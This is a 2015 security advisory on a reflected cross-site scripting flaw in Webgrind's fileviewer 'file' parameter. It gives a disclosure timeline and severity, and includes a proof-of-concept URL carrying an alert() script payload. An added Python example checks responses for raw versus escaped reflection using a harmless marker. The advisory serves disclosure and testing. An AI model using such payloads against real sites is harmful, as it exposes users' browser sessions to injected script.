Information security



From: hyp3rlinx_(at)_gmail.com <hyp3rlinx_(at)_gmail.com>
Date: June 8, 2015
Subject: Webgrind XSS vulnerability



Credits: John Page (hyp3rlinx)
Domains: hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is an Xdebug profiling web frontend written in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to reflected cross-site scripting: the `file` GET parameter of the `fileviewer` operation (index.php?op=fileviewer) is reflected into the HTML response without adequate output encoding, so attacker-supplied script in a crafted link runs in the browser of any Webgrind user who follows it.

Exploit code:
==============
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E
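The probe URL above is enough to confirm the issue by hand. The following script is an added example (not part of this advisory and not Webgrind code) that builds the same `op=fileviewer&file=` request with a harmless unique marker instead of an `alert()` payload, and classifies how a response body reflects it: verbatim (exploitable), HTML-escaped (output encoding applied), or not at all. The base URL `http://localhost/webgrind/index.php` is the one from the advisory; the two response bodies are constructed stand-ins for a real Webgrind page, so the script runs offline.

```python
"""Added example, not code from the advisory or from Webgrind: build the
fileviewer probe URL and classify how a response reflects the `file` value."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Base URL taken from the advisory's example request (assumed local install).
BASE_URL = "http://localhost/webgrind/index.php"

# Unique, benign marker: proving reflection does not require a working alert().
MARKER = "xss7k3qz"


def probe_value(marker: str = MARKER) -> str:
    """The value sent in `file`: the marker wrapped in angle brackets so that
    escaping (or the lack of it) is visible in the response."""
    return f"<{marker}>"


def build_probe_url(base_url: str = BASE_URL, marker: str = MARKER) -> str:
    """Return the fileviewer URL with the probe in the `file` parameter.
    urlencode percent-encodes '<' and '>' exactly as the advisory's URL does."""
    return base_url + "?" + urlencode({"op": "fileviewer", "file": probe_value(marker)})


def file_param(url: str) -> str:
    """Recover the decoded `file` value from a probe URL (sanity check of encoding)."""
    return parse_qs(urlsplit(url).query)["file"][0]


def reflection_status(body: str, marker: str = MARKER) -> str:
    """Classify how the probe came back in an HTML response body.

    'raw'     - the tag-wrapped marker appears verbatim: exploitable reflection
    'escaped' - only the HTML-escaped form appears: output encoding is applied
    'absent'  - the marker does not appear at all
    """
    probe = probe_value(marker)
    if probe in body:
        return "raw"
    if html.escape(probe, quote=True) in body:
        return "escaped"
    return "absent"


# Constructed sample responses standing in for a real Webgrind page.
VULNERABLE_BODY = "<html><body><h1>Profile of <xss7k3qz></h1></body></html>"
FIXED_BODY = "<html><body><h1>Profile of &lt;xss7k3qz&gt;</h1></body></html>"


if __name__ == "__main__":
    url = build_probe_url()
    print("probe URL:", url)
    print("decoded file param:", file_param(url))
    for name, body in (("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY)):
        print(f"{name}: {reflection_status(body)}")
```

Against a live instance you would fetch `build_probe_url()` and pass the response text to `reflection_status()`; a result of `raw` reproduces the advisory's finding, while `escaped` indicates the parameter is now encoded on output (for example with `htmlspecialchars()` in PHP), which is the expected fix for this class of bug.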

Disclosure Timeline:
==================================

May 19, 2015: Vendor notification
May 20, 2015: Public disclosure


Severity Level:
===============
Medium

Description:
============

Request Method(s):
    [+] GET

Vulnerable Product:
    [+] Webgrind

Vulnerable Parameter(s):
    [+] file=[XSS] (op=fileviewer in index.php)

Affected Area(s):
    [+] Current user (the browser session of whoever follows the crafted link).

==============================

(hyp3rlinx)

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod